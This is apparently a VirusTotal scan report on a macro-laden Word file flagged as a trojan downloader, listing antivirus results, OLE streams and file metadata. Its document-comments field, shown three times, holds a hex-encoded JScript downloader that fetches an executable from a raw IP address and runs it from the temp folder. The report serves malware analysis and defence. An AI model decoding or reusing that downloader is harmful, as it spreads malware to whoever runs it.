× Cookies are disabled! This site requires cookies to be enabled to work properly
SHA256: 3a56be53c1493e1bcfae1c22750a1511460a42984c0388fd7bf2b75e9ed041b4
File name: report.doc
Detection ratio: 7 / 53
Analysis date: 2016-08-12 13:03:25 UTC ( 1 year, 4 months ago ) View latest
Antivirus Result Update
Avira (no cloud) W2000M/Agent.6792369 20160812
ESET-NOD32 VBA/TrojanDownloader.Agent.BOO 20160812
Ikarus Trojan-Downloader.VBA.Agent 20160812
Sophos AV Troj/DocDl-EHO 20160812
Symantec W97M.Downloader 20160812
TrendMicro W2KM_DLOADR.YYSRJ 20160812
TrendMicro-HouseCall W2KM_DLOADR.YYSRJ 20160812
Ad-Aware 20160812
AegisLab 20160812
AhnLab-V3 20160812
Alibaba 20160812
ALYac 20160812
Antiy-AVL 20160812
Arcabit 20160812
Avast 20160812
AVG 20160812
AVware 20160812
Baidu 20160812
BitDefender 20160812
Bkav 20160812
CAT-QuickHeal 20160812
ClamAV 20160811
CMC 20160811
Comodo 20160812
Cyren 20160812
DrWeb 20160812
Emsisoft 20160812
F-Prot 20160812
F-Secure 20160812
Fortinet 20160812
GData 20160812
Jiangmin 20160812
K7AntiVirus 20160812
K7GW 20160812
Kaspersky 20160812
Kingsoft 20160812
Malwarebytes 20160812
McAfee 20160812
McAfee-GW-Edition 20160812
Microsoft 20160811
eScan 20160812
NANO-Antivirus 20160812
nProtect 20160812
Panda 20160812
Qihoo-360 20160812
SUPERAntiSpyware 20160812
Tencent 20160812
TheHacker 20160812
VBA32 20160811
VIPRE 20160812
ViRobot 20160812
Zillya 20160812
Zoner 20160812
The file being studied follows the Compound Document File format! More specifically, it is a MS Word Document file.
Commonly abused properties
The studied file makes use of macros, a macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically. Macros are often abused to perform malicious tasks when working with a document.
May create OLE objects.
Seems to contain deobfuscation code.
Summary
last_author
admin
creation_datetime
2016-08-06 17:17:00
revision_number
2
author
c
word_count
23
page_count
1
comments
66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
last_saved
2016-08-06 17:17:00
template
Normal.dot
keywords
g
title
character_count
116
subject
b
code_page
Cyrillic
application_name
Microsoft Office Word
Document summary
category
f
byte_count
25088
company
e
characters_with_spaces
137
line_count
4
manager
d
version
730895
paragraph_count
2
code_page
Cyrillic
OLE Streams
name
Root Entry
clsid
00020906-0000-0000-c000-000000000046
type_literal
root
clsid_literal
MS Word
sid
0
size
4096
type_literal
stream
size
113
name
\x01CompObj
sid
18
type_literal
stream
size
4096
name
\x05DocumentSummaryInformation
sid
5
type_literal
stream
size
4096
name
\x05SummaryInformation
sid
4
type_literal
stream
size
4096
name
1Table
sid
2
type_literal
stream
size
4993
name
Data
sid
1
type_literal
stream
size
412
name
Macros/PROJECT
sid
17
type_literal
stream
size
65
name
Macros/PROJECTwm
sid
16
type_literal
stream
size
51332
type
macro
name
Macros/VBA/Module1
sid
11
type_literal
stream
size
1097
type
macro (only attributes)
name
Macros/VBA/ThisDocument
sid
8
type_literal
stream
size
11069
name
Macros/VBA/_VBA_PROJECT
sid
12
type_literal
stream
size
1208
name
Macros/VBA/__SRP_0
sid
14
type_literal
stream
size
106
name
Macros/VBA/__SRP_1
sid
15
type_literal
stream
size
192
name
Macros/VBA/__SRP_2
sid
9
type_literal
stream
size
66
name
Macros/VBA/__SRP_3
sid
10
type_literal
stream
size
571
name
Macros/VBA/dir
sid
13
type_literal
stream
size
4152
name
WordDocument
sid
3
Macros and VBA code streams
[+] Module1.bas Macros/VBA/Module1 20029 bytes
create-ole obfuscated
ExifTool file metadata
Category
f

SharedDoc
No

Author
c

CodePage
Windows Cyrillic

LinksUpToDate
No

LastModifiedBy
admin

HeadingPairs
, 1

Template
Normal.dot

CharCountWithSpaces
137

CreateDate
2016:08:06 16:17:00

CompObjUserType
???????? Microsoft Office Word

ModifyDate
2016:08:06 16:17:00

Company
e

HyperlinksChanged
No

Characters
116

ScaleCrop
No

RevisionNumber
2

MIMEType
application/msword

Words
23

Bytes
25088

FileType
DOC

Lines
4

AppVersion
11.9999

Comments
66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d

Security
None

Software
Microsoft Office Word

TotalEditTime
0

Pages
1

CompObjUserTypeLen
31

Manager
d

FileTypeExtension
doc

Paragraphs
2

Keywords
g

Subject
b

File identification
MD5 8783e267751086a09130de0b16de5dec
SHA1 575f0f7f672a66eba44455eb5efaefa6443e760c
SHA256 3a56be53c1493e1bcfae1c22750a1511460a42984c0388fd7bf2b75e9ed041b4
ssdeep
1536:72KlEr8E2Xv29H0nk9wDVbo7TmfwNSei:TlE8qUVpsi

File size 91.5 KB ( 93696 bytes )
File type MS Word Document
Magic literal
CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: , Subject: b, Author: c, Keywords: g, Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d, Template: Normal.dot, Last Saved By: admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Aug 05 16:17:00 2016, Last Saved Time/Date: Fri Aug 05 16:17:00 2016, Number of Pages: 1, Number of Words: 23, Number of Characters: 116, Security: 0

TrID Microsoft Word document (80.0%)
Generic OLE2 / Multistream Compound File (20.0%)
Tags
obfuscated macros doc create-ole

VirusTotal metadata
First submission 2016-08-11 10:13:25 UTC ( 1 year, 4 months ago )
Last submission 2017-11-21 20:46:36 UTC ( 3 weeks, 5 days ago )
File names 0I_N4qMDk3.bin
aa
virus-monparfum.do_
info.doc
0F263AA3-CB78-4130-B557-AC9FB5303602_1d1f492dc847d9b
report.doc
No comments. No VirusTotal Community member has commented on this item yet, be the first one to do so!

Leave your comment...

?
Post comment

You have not signed in. Only registered users can leave comments, sign in and have a voice!

No votes. No one has voted on this item yet, be the first one to do so!